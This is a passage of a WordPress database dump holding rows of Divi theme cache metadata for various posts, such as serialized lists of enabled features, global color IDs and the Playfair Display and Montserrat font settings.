670,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33266,670,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33259,1327,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33260,1327,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33261,1327,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33262,1327,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33254,1157,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33255,1231,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33256,1231,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33257,1231,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33258,1231,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33249,1328,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33250,1328,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33251,1157,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33252,1157,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33253,1157,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33245,628,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33246,628,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33247,1328,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33248,1328,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33239,1065,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33240,1065,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33241,1065,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33242,1065,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33243,628,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33244,628,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33235,1545,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33236,1545,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33237,1545,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33238,1545,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33231,1016,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33232,1016,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33233,1016,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33234,1016,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33229,1175,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33230,1175,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33223,976,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33224,976,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33225,976,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33226,976,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33227,1175,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33228,1175,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33210,576,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33211,552,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33212,552,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33213,552,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33214,552,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33215,1515,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33216,1515,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33217,1515,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33218,1515,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33219,674,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33220,674,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33221,674,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0